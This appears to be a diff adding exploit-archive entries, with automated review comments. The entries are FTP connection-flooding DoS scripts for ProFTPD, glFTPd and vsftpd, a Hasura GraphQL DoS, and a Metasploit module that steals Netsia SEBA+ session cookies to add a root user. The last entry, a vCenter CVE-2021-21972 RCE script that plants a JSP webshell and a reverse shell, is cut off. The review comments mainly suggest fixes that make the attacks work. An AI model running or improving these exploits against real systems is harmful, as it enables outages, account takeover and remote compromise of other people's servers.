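Review bot: `twofactor()` and `rce()` hard-code the administrator's username as `admin` (`this.username%3d%3d%3d\'admin\'` in the `$where` payload and `"username":"admin"` in the TOTP login) while the script identifies the admin by e-mail (`-a`), so on any instance whose admin account is not literally named `admin` the secret extraction returns a slice of an error body and the final login fails with `[-] Couldn't authenticate`; take the username as an option, or resolve it from `users.list` by the given e-mail before building the `$where` query. The user-id, token and integration fields are cut out of Meteor's JSON by fixed offsets (`data[32:49]`, `data[60:103]`, `r.text[46:98]`, `data.split(',')[12][9:57]`), which breaks on any key-order or id-length change — `json.loads` the `message` field and read `result.id` / `result.token`, and the `integration` object, by name. Operationally the script overwrites both the low-privileged user's and the administrator's password with the fixed `P@$$w0rd!1234`, never restores them, and disables TLS verification on every request with `verify = False`; the header should warn that a run locks real users out and is immediately visible from the reset e-mails it triggers. `resettoken()` also keeps iterating `characters` after a position matches instead of `break`ing, which costs up to 64 extra requests per character at the built-in 0.5 s delay.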
@@ -0,0 +1,101 @@
+# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
+# Date: 22/03/2021
+# Exploit Author: xynmaps
+# Vendor Homepage: http://www.proftpd.org/
+# Software Link: https://github.com/proftpd/proftpd
+# Version: 1.3.7a
+# Tested on: Parrot Security OS 5.9.0
+
+#-------------------------------#
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+| ProFTPD |
+| D o S |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} ".format(sys.argv[0])
+
+def test(t,p):
+ s = socket.socket()
+ s.settimeout(10)
+ try:
+ s.connect((t, p))
+ response = s.recv(65535)
+ s.close()
+ return 0
+ except socket.error:
+ print("Port {} is not open, please specify a port that is open.".format(p))
+ sys.exit()
+def attack(targ, po, id):
+ try:
+ subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ #print("Worker {} running".format(id))
+ except OSError: pass
+def main():
+ global target, port, start
+ print banner
+ try:
+ target = sys.argv[1]
+ except:
+ print usage
+ sys.exit()
+ try:
+ port = int(sys.argv[2])
+ except:
+ port = 21
+ try:
+ conns = int(sys.argv[3])
+ except:
+ conns = 50
+ print("[!] Testing if {0}:{1} is open".format(target, port))
+ test(target, port)
+ print("[+] Port {} open, starting attack...".format(port))
+ time.sleep(2)
+ print("[+] Attack started on {0}:{1}!".format(target, port))
+ def loop(target, port, conns):
+ global start
+ threading.Thread(target=timer).start()
+ while 1:
+ for i in range(1, conns + 3):
+ t = threading.Thread(target=attack, args=(target,port,i,))
+ t.start()
+ if i > conns + 2:
+ t.join()
+ break
+ loop()
+
+ t = threading.Thread(target=loop, args=(target, port, conns,))
+ t.start()
+
+def timer():
+ start = time.time()
+ while 1:
+ if start < time.time() + float(900): pass
+ else:
+ subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ t = threading.Thread(target=loop, args=(target, port,))
+ t.start()
+ break
+
+main()
\ No newline at end of file
diff --git a/exploits/multiple/dos/49773.py b/exploits/multiple/dos/49773.py
new file mode 100755
index 000000000..beaa01d3a
--- /dev/null
+++ b/exploits/multiple/dos/49773.py
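Review bot: The script cannot run as written: `loop` is a nested function of `main()` declared as `loop(target, port, conns)` but it recurses as `loop()` with no arguments (TypeError), and `timer()` refers to `loop` at module scope where it does not exist (NameError) and would pass only two arguments anyway. The 900-second re-arm never fires either, because `start < time.time() + float(900)` is true from the first iteration, so `timer()` spins in a busy loop; the test should be `if time.time() - start >= 900:`. `print banner` and `print usage` are Python 2 statements while the rest is written to run on either, so either pin `#!/usr/bin/env python2` or use `print(banner)`. Finally, spawning `ftp host port` through `shell=True` only occupies a server slot for as long as the external client lives; a `socket.create_connection()` kept open in a list holds the connection without depending on an `ftp` binary or shell quoting of argv.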
@@ -0,0 +1,101 @@
+# Exploit Title: glFTPd 2.11a - Remote Denial of Service
+# Date: 15/05/2021
+# Exploit Author: xynmaps
+# Vendor Homepage: https://glftpd.io/
+# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
+# Version: 2.11a
+# Tested on: Parrot Security OS 5.9.0
+
+#-------------------------------#
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+| glFTPd |
+| D o S |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} ".format(sys.argv[0])
+
+def test(t,p):
+ s = socket.socket()
+ s.settimeout(10)
+ try:
+ s.connect((t, p))
+ response = s.recv(65535)
+ s.close()
+ return 0
+ except socket.error:
+ print("Port {} is not open, please specify a port that is open.".format(p))
+ sys.exit()
+def attack(targ, po, id):
+ try:
+ subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ #print("Worker {} running".format(id))
+ except OSError: pass
+def main():
+ global target, port, start
+ print banner
+ try:
+ target = sys.argv[1]
+ except:
+ print usage
+ sys.exit()
+ try:
+ port = int(sys.argv[2])
+ except:
+ port = 21
+ try:
+ conns = int(sys.argv[3])
+ except:
+ conns = 50
+ print("[!] Testing if {0}:{1} is open".format(target, port))
+ test(target, port)
+ print("[+] Port {} open, starting attack...".format(port))
+ time.sleep(2)
+ print("[+] Attack started on {0}:{1}!".format(target, port))
+ def loop(target, port, conns):
+ global start
+ threading.Thread(target=timer).start()
+ while 1:
+ for i in range(1, conns + 3):
+ t = threading.Thread(target=attack, args=(target,port,i,))
+ t.start()
+ if i > conns + 2:
+ t.join()
+ break
+ loop()
+
+ t = threading.Thread(target=loop, args=(target, port, conns,))
+ t.start()
+
+def timer():
+ start = time.time()
+ while 1:
+ if start < time.time() + float(900): pass
+ else:
+ subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ t = threading.Thread(target=loop, args=(target, port,))
+ t.start()
+ break
+
+main()
\ No newline at end of file
diff --git a/exploits/multiple/dos/49789.py b/exploits/multiple/dos/49789.py
new file mode 100755
index 000000000..c2c02f7a2
--- /dev/null
+++ b/exploits/multiple/dos/49789.py
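Review bot: This is the ProFTPD script from the previous file with the name swapped, and it carries the same blocking defects: the nested `loop(target, port, conns)` recurses as `loop()` with no arguments, `timer()` names `loop` and `conns`-less args from module scope where `loop` is not defined, and `start < time.time() + float(900)` is always true so the re-arm branch is dead and the thread busy-spins. The one-line fix for the timer is `if time.time() - start >= 900:`; the recursion should pass its own arguments or simply rely on the enclosing `while 1:`. Since three entries in this commit share the body, the shared part belongs in one script with the product name as a parameter rather than three copies that will drift; and a header stating the glFTPd setting that caps connections (the text only says "a certain amount") would tell readers when the DoS applies.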
@@ -0,0 +1,50 @@
+# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service
+# Software: Hasura GraphQL
+# Software Link: https://github.com/hasura/graphql-engine
+# Version: 1.3.3
+# Author: Dolev Farhi
+# Date: 4/19/2021
+# Tested on: Ubuntu
+
+import sys
+import requests
+import threading
+
+HASURA_SCHEME = 'http'
+HASURA_HOST = '192.168.1.1'
+HASURA_PORT = 80
+THREADS = 300
+
+def create_table():
+ data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]}
+ endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
+ r = requests.post(endpoint, json=data)
+ return r
+
+def insert_row():
+ bomb = 'A' * 100000
+ data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}}
+ endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
+ r = requests.post(endpoint, json=data)
+ return r
+
+def DoS():
+ dups = 'test \n ' * 1000000
+ data = {'query': 'query { test_db { ' + dups + '} }'}
+ endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
+ r = requests.post(endpoint, json=data)
+ return r
+
+if not create_table().ok:
+ print('something went wrong, could not create table.')
+ sys.exit(1)
+
+if not insert_row().ok:
+ print('something went wrong, could not insert row')
+ sys.exit(1)
+
+while True:
+ for _ in range(THREADS):
+ print('Starting')
+ t = threading.Thread(target=DoS, args=())
+ t.start()
\ No newline at end of file
diff --git a/exploits/multiple/remote/49719.py b/exploits/multiple/remote/49719.py
new file mode 100755
index 000000000..b5ca35382
--- /dev/null
+++ b/exploits/multiple/remote/49719.py
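Review bot: `create_table()` and `insert_row()` drive `/v1/query` with `run_sql`, `add_existing_table_or_view` and `insert` but send no `X-Hasura-Admin-Secret` header, so on any instance that has an admin secret set the first call is refused and the script exits at `could not create table`; the header should state that the precondition is an engine with no admin secret (or add the header from a constant next to `HASURA_HOST`). `create_table()` also fails on every run after the first because `test_db` already exists — `CREATE TABLE IF NOT EXISTS` and tolerating an already-tracked response would make the PoC re-runnable. The `while True:` / `for _ in range(THREADS):` loop starts threads without bounding or joining them, so the attacking host exhausts its own thread and socket limits rather than holding 300 in flight; a `threading.Semaphore(THREADS)` acquired in `DoS()` and released in a `finally:` keeps the intended concurrency. The query body is about 7 MB (`'test \n ' * 1000000` repeated field selections), which is the actual amplification here and worth stating in the header so readers can judge whether a request-size limit on the front proxy already blocks it.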
@@ -0,0 +1,101 @@
+# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
+# Date: 22-03-2021
+# Exploit Author: xynmaps
+# Vendor Homepage: https://security.appspot.com/vsftpd.html
+# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
+# Version: 3.0.3
+# Tested on: Parrot Security OS 5.9.0
+
+#-------------------------------#
+
+#encoding=utf8
+#__author__ = XYN/Dump/NSKB3
+#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
+"""
+VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
+you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
+(if it's limited, just run this script from different proxies using proxychains, and it will work)
+"""
+
+import socket
+import sys
+import threading
+import subprocess
+import time
+
+banner = """
+._________________.
+| VS-FTPD |
+| D o S |
+|_________________|
+|By XYN/DUMP/NSKB3|
+|_|_____________|_|
+|_|_|_|_____|_|_|_|
+|_|_|_|_|_|_|_|_|_|
+
+"""
+usage = "{} ".format(sys.argv[0])
+
+def test(t,p):
+ s = socket.socket()
+ s.settimeout(10)
+ try:
+ s.connect((t, p))
+ response = s.recv(65535)
+ s.close()
+ return 0
+ except socket.error:
+ print("Port {} is not open, please specify a port that is open.".format(p))
+ sys.exit()
+def attack(targ, po, id):
+ try:
+ subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ #print("Worker {} running".format(id))
+ except OSError: pass
+def main():
+ global target, port, start
+ print banner
+ try:
+ target = sys.argv[1]
+ except:
+ print usage
+ sys.exit()
+ try:
+ port = int(sys.argv[2])
+ except:
+ port = 21
+ try:
+ conns = int(sys.argv[3])
+ except:
+ conns = 50
+ print("[!] Testing if {0}:{1} is open".format(target, port))
+ test(target, port)
+ print("[+] Port {} open, starting attack...".format(port))
+ time.sleep(2)
+ print("[+] Attack started on {0}:{1}!".format(target, port))
+ def loop(target, port, conns):
+ global start
+ threading.Thread(target=timer).start()
+ while 1:
+ for i in range(1, conns + 3):
+ t = threading.Thread(target=attack, args=(target,port,i,))
+ t.start()
+ if i > conns + 2:
+ t.join()
+ break
+ loop()
+
+ t = threading.Thread(target=loop, args=(target, port, conns,))
+ t.start()
+
+def timer():
+ start = time.time()
+ while 1:
+ if start < time.time() + float(900): pass
+ else:
+ subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ t = threading.Thread(target=loop, args=(target, port,))
+ t.start()
+ break
+
+main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49435.rb b/exploits/multiple/webapps/49435.rb
new file mode 100755
index 000000000..8d45bcaca
--- /dev/null
+++ b/exploits/multiple/webapps/49435.rb
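Review bot: This is a connection-exhaustion DoS, yet the file lands in `exploits/multiple/remote/` per the `+++ b/exploits/multiple/remote/49719.py` header while the byte-identical ProFTPD and glFTPd scripts in this commit sit under `exploits/multiple/dos/`; it should be filed with them. It also inherits the defects that keep the shared body from running: the nested `loop(target, port, conns)` recurses as `loop()` without arguments, `timer()` references `loop` from module scope where it is undefined, and `start < time.time() + float(900)` is always true so the re-arm never triggers and the thread busy-spins (`if time.time() - start >= 900:` is the intended test). `print banner` / `print usage` are Python 2 syntax, so pin the interpreter or use `print(banner)`. The docstring's "only lets a certain amount of connections" should name the vsftpd limit it relies on, since the text itself concedes the attack fails when the per-IP limit is set.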
@@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , + 'Description' => %q{ + This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. + HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, + can be performed without the need for any session(cookie) information. + Therefore, the session cookie informations of the active users in the application can be read from the response content. + A new authorized user can be created with the obtained cookie. + }, + 'References' => + [ + [ 'CVE', '' ], + [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], + [ 'URL', 'https://www.netsia.com' ] + ], + 'Author' => + [ + 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "2021-01-06", + 'DefaultOptions' => { 'SSL' => true } + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'The username for your new account']), + OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) + ]) + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def check + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + + rescue + return Exploit::CheckCode::Unknown + end + + if res.code == 200 and res.body.include? 'sessionId' + return Exploit::CheckCode::Vulnerable + else + if res.code == 200 and res.body.include? 'SUCCESS' + print_status("Target is vulnerable! 
But active admin session was not found. Try again later.") + return Exploit::CheckCode::Appears + end + end + + return Exploit::CheckCode::Safe + end + + def count_user(data, find_string) + data.scan(/(?=#{find_string})/).count + end + + def run + unless Exploit::CheckCode::Vulnerable == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), + ) + sescount = count_user(res.body,'"name"') + print_good("Currently #{sescount} active sessions have been detected.") + + cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) + puts cookies + $i = 0 + + while $i <= sescount do + sessloop = cookies[$i] + sessid = "SESSION=" + sessloop.to_s + cookie = sessid.split('"]').join('').split('["').join('') + $i +=1 + json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, 
{"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", 
"/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", 
"/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": 
"location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", 
"/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' + + res = send_request_raw({ + 'method' => 'POST', + 'ctype' => 
'application/json', + 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), + 'cookie' => cookie, + 'data' => json_data + }) + + if res.code == 200 and res.body.include? '"SUCCESS"' + print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") + print_good("Username : #{datastore["USERNAME"]}") + print_good("Password : #{datastore["PASSWORD"]}") + break + end + end + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/50056.py b/exploits/multiple/webapps/50056.py new file mode 100755 index 000000000..528c5d1e9 --- /dev/null +++ b/exploits/multiple/webapps/50056.py 
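Review bot: `check` dereferences `res` without a nil guard: `send_request_cgi` returns nil on a timeout or dropped connection rather than raising, so `res.code` raises NoMethodError instead of returning `CheckCode::Unknown`; add `return Exploit::CheckCode::Unknown unless res` after the request, and the same after the second request in `run`. `puts cookies` writes every harvested session identifier straight to stdout outside the framework's output helpers, so the stolen tokens end up verbatim in console transcripts; use `vprint_status` or drop the line. The loop `while $i <= sescount` relies on a process-wide global and runs one iteration past the number of `"name"` matches, which is not guaranteed to equal the number of `sessionId` captures, so the last iteration can send `SESSION=` with an empty value; iterate `cookies.each` instead. `[ 'CVE', '' ]` is an empty reference and should be removed.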
@@ -0,0 +1,117 @@ +# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 06/21/2021 +# Exploit Author: CHackA0101 +# Vendor Homepage: https://kb.vmware.com/s/article/82374 +# Software Link: https://www.vmware.com/products/vcenter-server.html +# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). +# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux) +# CVE: 2021-21972 + +# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md + +#!/usr/bin/python2 + +import os +import urllib3 +import argparse +import sys +import requests +import base64 +import tarfile +import threading +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +myargs=argparse.ArgumentParser() +myargs.add_argument('-T','--target',help='The IP address of the target',required=True) +myargs.add_argument('-L','--local',help='Your local IP',required=True) +args=myargs.parse_args() + +def getprompt(x): + print ("(CHackA0101-GNU/Linux)$ "+ str(x)) + +def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"): + fullpath="../" * 7 + path + return fullpath.replace('\\','/').replace('//','/') + +def createbackdoor(localip): + # shell4.jsp + backdoor = "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" + backdoor = base64.b64decode(backdoor).decode('utf-8') + f = open("shell4.jsp","w") + f.write(backdoor) + f.close() + # reverse.sh + # After decoding overwrite string 'CUSTOM_IP' for local IP + 